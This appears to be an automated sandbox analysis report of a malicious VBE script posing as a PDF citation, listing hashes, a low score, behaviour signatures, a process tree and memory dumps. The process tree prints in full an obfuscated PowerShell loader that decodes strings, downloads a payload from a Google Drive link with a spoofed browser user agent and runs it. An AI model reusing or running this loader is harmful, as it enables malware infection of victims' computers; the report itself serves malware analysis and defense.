Analysis

  • max time kernel
    122s
  • max time network
    123s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    20-11-2024 15:52

General

  • Target

    LSMU CITATA LT 20-11-2024·pdf.vbe

  • Size

    11KB

  • MD5

    df045c185b46e8c2432ea266b0671f86

  • SHA1

    db27134d7be95240a1349bbcd1a1dcfa0dfb3506

  • SHA256

    27ab626711706fe4699ec17a7d7e0cd6aa2181ac87d7693cf55ef728242d4181

  • SHA512

    99306cbf23bf7a00a398849ca8ff25ce9ab1659f686e28e3e843b1a1632637495c177044173e70ad58571e2d856f4aa4e4b22b2e48e9a8cc3944feabeb4e11ae

  • SSDEEP

    192:1P3nxwOrFEWWm60w5HPZMy35kCktIFc/T+zxLQkQUYUu59ynvT/1dut4VXcz1Xzy:9pJEWM08HRdyCHFsaFQkQUYhivZktOMc

Score
3/10

Malware Config

Signatures

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\LSMU CITATA LT 20-11-2024·pdf.vbe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2348
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Subnutritious Uninstructedness snigvejen Sortilegi #><#Diectasis Rodfunktioner Brdristens Sangerne #>$Bortfaldenes='Obskniteters';function Allemandes($Erhvervsgeografien){If ($host.DebuggerEnabled) {$nickelodeons=4} for ($Thimotheuss=$nickelodeons;;$Thimotheuss+=5){if(!$Erhvervsgeografien[$Thimotheuss]) { break }$Adgangskortenes55+=$Erhvervsgeografien[$Thimotheuss]}$Adgangskortenes55}function Xylotomies207($Sablende){ .($Douser) ($Sablende)}$Samandura=Allemandes 'BeteN TjeE inttRace. DelWSteneJustb FutCBacklTheoIRensEKagenRecat';$Trolls=Allemandes 'KonsMDrivo lluzHvlbipicklReprl J.naTold/';$Tereu=Allemandes 'NonaTGo.ilBegosEpid1 Opk2';$Tapeline=' Kat[ GuendelmeProit pro. UkoSAnakeMon.r.eacvla,gI R.fC SumeCorypCromo erIKjo nTopftSicum umoaForsN oraSoftgAeaceAffiRSpy ]endi:Liga: ,veSRevleYeascMareUBundrSvrniRoulTTi byin oP w nRLumboLaocT Foro zencToplOc rvLBars= Fer$OvartdiveE ReirB neEDen U';$Trolls+=Allemandes ' Tub5Firb.Sing0Rger Ngle(E,shWSel iBrs.n Li,dAfproGraywWronsOpsv H,ksN.ranTB dm Tyr 1Afko0Nonf.Unsp0Char; Kab nkuWB skiThu nLose6U su4Elec;svin Theox nom6Alge4,ice;U,ve n.nrKa.evAwfu:Spur1E.vi3H pe1F sh.Metr0 Enc)afna BegaG Greeel zcPrenkGrapoDekl/Mine2Aris0Semi1.ini0tvan0 Ano1Fr n0 Sol1alb, inF einiGrnsrSlove,verfPr voImbrxVisu/,ide1Alla3F,is1 He .,rem0';$Floristernes=Allemandes ' BreUPulssGuide PasrEnso-jestA Br GCus ENo tnMrkeT';$Infinitively=Allemandes 'NonmhArmvtBekrtSpanp uersWa e:Akry/Soc./ vrdd otr .uciTranv SereStag.SatrgHjeroableoCensg LaplExcieinte.vandcPoetoSu fm Ska/H teupr mc rk?Overe enxDecapruntoMararbro tKnob=tabudSe ioPropwOstenBar.llustoRivea Re dOrga& Geni haedDith=.lot1 rekzheadiMeloYStkyxC unCKummjDe.kUDescv.egij No.9Acra9TranQEna tVa.mXKolaQiracjPostBPianjTereAFacex BihM B osRegne AdemU saosysi3CondELondXBill9adonDvapu8Stanj';$Chroococcoid=Allemandes 'Malp>';$Douser=Allemandes 'GirgILrebEPegbx';$Jakey='Risting';$Undepreciatory='\Malodourously.dar';Xylotomies207 (Allemandes 'Glue$BeclgAfbll TesoVrisb InqA lazlNomi:AtroB.eetrI quI .ubsthinKffes=Feb,$Jus eElixNWoohVSvam:OppuA UnppRan pNo,mdHa vA Ma t s nAAnti+Af.a$LedeuS erNN veDDokuEAtomP BanrV,teEDadacHjruI AnbA,hilt nnooDoseRRe lY');Xylotomies207 (Allemandes 'Abat$AdelGM isLSuppo TarBFag,aC smL .es:HusmoNoduM Ti sIu iaaarst BistCannECell=E.en$ GavICallnOverfSkumIOverNLapiIUdb,tR ndisabbvweire An.lMissYKobl. U ssSlipPPa,iLRastI S mT ice( S,o$ egicDa kHGasmrUnsioOp,uORe,lC TurO.patcCoadCKar.o BorI ,ukDlde )');Xylotomies207 (Allemandes $Tapeline);$Infinitively=$Omsatte[0];$Unpositively=(Allemandes ' Del$Eu,aGU koLVa eONiccb Kn AHiplLB yg:HaarwSupeiT.mmECathNSl eERetiRNumibA teRTanddKompsCavasqua TD,loNReprG PlueLysnrcandNJrg e Gei=ImpeNDu dEtit WS en-RaadoVanrb Lo jOmdmEV ndCBrieT ykn Tecssel YRg.osfalsT BonEDe,lM Afs.Auke$UnchSPoliATorfM tudASandNPam D Flau FelRLaurA');Xylotomies207 ($Unpositively);Xylotomies207 (Allemandes ' T,e$BoucW periTelle m.gnOvere Albr VokbNab,r PyrdBri,sR.sssDi,ctglasn Parg FloeDelgrIntenSigteAand.Rec,H FoneAbigaKagedForteDebarl onsalte[Arch$MisdF E,tl PodoCa.hr F uiDfrnsLa gtI aqeSva r,nddnUndeeRainsK.ss]Bu.e=Selv$ eadT .ocrRea oUrinlSp il .urs');$Udfladnings=Allemandes 'Poly$ A,aW Pa iSvireBenenJeereQuinrSharbOpisr TildCigasAm asVaretDeprnBeswgAb resikkr Lemn LauePhia.mi,iDfermotek.wT ken Huml orao LivaPresdSorbFHystiUdvelk tee for(Spid$O ivI LiznNonsfSolii UndnStifiSautt RosiBesvvRadreS yrlKonfyReve,Uno.$DgnaARubrnLa dd HoceNua nJennpBurmrD,sim U oiProte amps nww)';$Andenprmies=$Brisk;Xylotomies207 (Allemandes 'Un.i$ de GTubol ltroDeacbAll aNiobLEpit: C rKUti,l.aadOses VThilnBrugNZym UOpglm etrM CroEWin R Mus= sa.(Ne tTT nkEOmgjSHestTOutt-Tro,PextraudslTSkriHFlit N,ds$Essea UraNStudDTimbe MesNGhosPHei,rBalkM,onpIAmmeESkjoSUniv)');while (!$Klovnnummer) {Xylotomies207 (Allemandes 'Borg$.urrgHum lpuncoGe ebOvera Eb,lHead:Par,C PeroShamxJordc ArioUg.lmBrusb,efor.hapiCyaneKry s aan=c as$M,leBTyp o ErlsPhr tEn,etA,jee R,ar') ;Xylotomies207 $Udfladnings;Xylotomies207 (Allemandes 'PsycsNonet RepAPerorSeptTf,el-NedfSDizelBeneeLoneePetrPTwea Bri 4');Xylotomies207 (Allemandes ' Rib$C isgUnd.L BlrOd.febTsadaVitaL Ra.:EmbrkSekulRombO ensvChicNdeponMiddu.verm He m NauEKa pRWarn=skra(p peT eskEFruss TriTH rm- mazpMisuA U sTConthRepr b.n$FagoaRecoNUnf dBredE ygenPivopIm.rRBa emUnbeIBereeD,masUd,r)') ;Xylotomies207 (Allemandes ' Fl,$Dilag Gral coOYohibTa laOutplRipo: Ca SwoulPF ruROdden EngG,funHT ykoSkewv nkeeKommd Fl eEpidrDecon.rteech rsUrmi=prel$reapgArbeLNonsO K obMissAHjemL Ndv:Dolio otiFk,gefBankSOvercIr.eRFor EBogseBambNP ri+ Flu+ Jus%Mack$NienoForuMGyngSCeduALkkeTTermtAnmeeinsp. Pr C CysO T pUG arnMokkT') ;$Infinitively=$Omsatte[$Sprnghovedernes]}$Thimotheussndsamles=315155;$Desmolase=29732;Xylotomies207 (Allemandes 'Prom$VgtiGAistLIn.eoTinhbraisAUdsklAl e: Fu sRecuLCarcEDre UhomotTessHB stHStruO La UObarN forD Pri Ac e=Demi TilgtraweMil T Jde-Col cRik o patN Ly,t.rllEForrngadoTSt,l Unad$ SmaamarinDys,dSubeERibeNVagtpWom RTvanML,erIApanEArsmS');Xylotomies207 (Allemandes '.etr$ alig AselPlumoV sabLemmaFeudllogo: Un FUnpaodaddr Dele eoigUnhug.oillRestiAf lnKloogBegreKonfnOmv sM.re Nic=Graf O t[ CruSMusiyTrubsDisrtSymbeSolbmExci.OverCAreooBul nConsvBegie tavrAnkot ind]Komp: Hea:GlaiFSayerdimhoHogrm emiBInflaFlu s fore Sam6Spru4 An,SratitTremrFortiBerenJackgD,sl(Ta u$MollSRazzl.ilje Hylu Re t FrshMarehSalboUdflu Monnear,dAfsk)');Xylotomies207 (Allemandes 'Sk n$HoldgAccrLur eO Synbma ta VanL Ti,: onUSt nNefteSPol e Fl CGa srspriEOverTDispE resDBy,n Tra=S ri Hnde[VeinSSnegYMuffS Pe TDiseeSen MP ot.Ov,rtSti E AflXHom T s,r.Reb e,ysiN RotcK,mpORebaDVoldi Fo.NImplgPelo]J.rd:T et:ImdeaBeaaSRubecLan iBarfiBab,. islG uneETi nT,oreSMundTBai RIn eiPo,eNRe lGTele(Attr$blanfMis oHatcRTaoieBlyrGSim,GOve l ,eaiEnednSugngR voENonsNAshiSRequ)');Xylotomies207 (Allemandes ' Spi$f lsG ,mplUn ooTropBHalvAKalkLOlie:FusuEZilcU punrOverOOmklp PvtAAfhnmSvibEEnlaSNysgTVo.aEPascRSixpe Pren CocsCons=Land$ Appu losNGrafSnybeeSpi.c SpdRFrste Rolt bacEH mmdMeth. F,rs RenuBlodBSep SBarnTB nirKoleiParanBa dGDark(Iden$SubfTCrumhpleuIPlanMSaddOK.nsTfla.HGasteMetauR soSActaSMininS roD RetS SnkABodsmT.kslinteEUnd SEu,r,dolo$ObliD UfoeVagtsSly mxeraoDeneL Amia Acas rseeReor)');Xylotomies207 $Europamesterens;"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2472

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/2472-4-0x000007FEF638E000-0x000007FEF638F000-memory.dmp

    Filesize

    4KB

  • memory/2472-5-0x000000001B840000-0x000000001BB22000-memory.dmp

    Filesize

    2.9MB

  • memory/2472-6-0x0000000001E90000-0x0000000001E98000-memory.dmp

    Filesize

    32KB

  • memory/2472-7-0x000007FEF60D0000-0x000007FEF6A6D000-memory.dmp

    Filesize

    9.6MB

  • memory/2472-8-0x000007FEF60D0000-0x000007FEF6A6D000-memory.dmp

    Filesize

    9.6MB

  • memory/2472-9-0x000007FEF60D0000-0x000007FEF6A6D000-memory.dmp

    Filesize

    9.6MB

  • memory/2472-10-0x000007FEF60D0000-0x000007FEF6A6D000-memory.dmp

    Filesize

    9.6MB

  • memory/2472-11-0x000007FEF60D0000-0x000007FEF6A6D000-memory.dmp

    Filesize

    9.6MB

  • memory/2472-12-0x000007FEF60D0000-0x000007FEF6A6D000-memory.dmp

    Filesize

    9.6MB

  • memory/2472-13-0x000007FEF638E000-0x000007FEF638F000-memory.dmp

    Filesize

    4KB

  • memory/2472-14-0x000007FEF60D0000-0x000007FEF6A6D000-memory.dmp

    Filesize

    9.6MB

  • memory/2472-15-0x000007FEF60D0000-0x000007FEF6A6D000-memory.dmp

    Filesize

    9.6MB

  • memory/2472-16-0x000007FEF60D0000-0x000007FEF6A6D000-memory.dmp

    Filesize

    9.6MB

  • memory/2472-17-0x000007FEF60D0000-0x000007FEF6A6D000-memory.dmp

    Filesize

    9.6MB